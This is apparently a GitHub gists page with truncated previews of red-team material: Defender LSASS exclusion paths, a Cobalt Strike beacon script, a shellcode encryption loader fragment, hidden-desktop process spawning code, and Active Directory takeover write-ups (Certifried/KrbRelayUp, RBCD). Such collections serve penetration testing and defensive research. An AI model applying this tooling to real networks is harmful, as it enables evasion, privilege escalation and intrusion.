Skip to content

Instantly share code, notes, and snippets.

View ryanbaxendale's full-sized avatar

Ryan Baxendale ryanbaxendale

168 followers · 1.4k following
View GitHub Profile
@adamsvoboda
adamsvoboda / gist:9ac52548d3d81f3185e36b9f0be31990
Created August 30, 2023 15:02
Windows Defender LSASS ASR Exclusion Paths - 08.30.2023
%windir%\system32\WerFaultSecure.exe
%windir%\system32\mrt.exe
%windir%\system32\svchost.exe
%windir%\system32\NETSTAT.EXE
%windir%\system32\wbem\WmiPrvSE.exe
%windir%\system32\DriverStore\FileRepository\*\NVWMI\nvWmi64.exe
%programfiles(x86)%\Microsoft Intune Management Extension\ClientHealthEval.exe
%programfiles(x86)%\Microsoft Intune Management Extension\SensorLogonTask.exe
%programfiles(x86)%\Microsoft Intune Management Extension\Microsoft.Management.Services.IntuneWindowsAgent.exe
%programdata%\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\*\OpenHandleCollector.exe
@defparam
defparam / MutateMethods.py
Last active April 24, 2024 15:29
Example of using Turbo Intruder in a "listen and attack" mode. Because turbo intruder's jython interpreter is technically inside burp you can have turbo intruder scripts use the plugin API. Here we use burp.IProxyListener to intercept requests and reissue them inside turbo intruder mutating the method.
from threading import Thread
import time
class TrafficMagnet(burp.IProxyListener):
def __init__(self):
callbacks.registerProxyListener(self)
self._helpers = callbacks.getHelpers()
self._callbacks = callbacks
@tothi
tothi / certifried_with_krbrelayup.md
Last active November 22, 2023 10:47
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@Flangvik
Flangvik / gist:c31b26129743be699133dc9dab9c02c5
Created February 3, 2022 13:17
NewIpAlert.cna
on heartbeat_15m {
foreach $beacon (beacons()) {
println("[VPN] Running command on id: " . $beacon['id'] . ", hostname:" . binfo($beacon['id'], "computer") . "\n");
$id = $beacon['id'];
bipconfig($id,{
print("[VPN] Captured network interfaces from " . binfo($1, "computer") . ", looking for a new IPs to alert on\n");
exec("python3.7 /<fullpath>/AlertOnNewIp.py --data " . transform($2, "powershell-base64") . " --user " . binfo($1, "user") . " --computer " . binfo($1, "computer"));
});
}
@Flangvik
Flangvik / gist:5fb58dffa373a50f4d560a14adaa415b
Last active February 4, 2022 03:24
AlertOnNewIp.py
#!/usr/bin/env python
# Super dirty python3 scripts that alerts Cobalt Strike operator using pushover when a new IP is found amoung network interface on beacon
# Aggressor script for triggering this : https://gist.github.com/Flangvik/c31b26129743be699133dc9dab9c02c5
import argparse
from datetime import datetime
from base64 import b64encode,b64decode
from pushover import init, Client
from os import path
parser = argparse.ArgumentParser(description='beacon info')
@jackullrich
jackullrich / mainc.c
Last active November 3, 2023 17:20
Single Step Encryption/Decryption
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;
@Flangvik
Flangvik / PKI_Abuse_cheatsheet.md
Last active August 26, 2023 13:22
PKI Abuse CheatSheet
@Mr-Un1k0d3r
Mr-Un1k0d3r / run.c
Created August 11, 2021 18:07
spawn an invisible process
// To compile: gcc64.exe run.c -o run.exe
// To run: run.exe cmd.exe "/c whoami"
#include <Windows.h>
#include <stdio.h>
int main(int argc, char **argv) {
CHAR cDesktop[] = "hiddendesktop";
HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL);
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active June 23, 2024 22:01
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@hasherezade
hasherezade / injection_demos.md
Last active May 18, 2024 20:57
List of my PE injection demos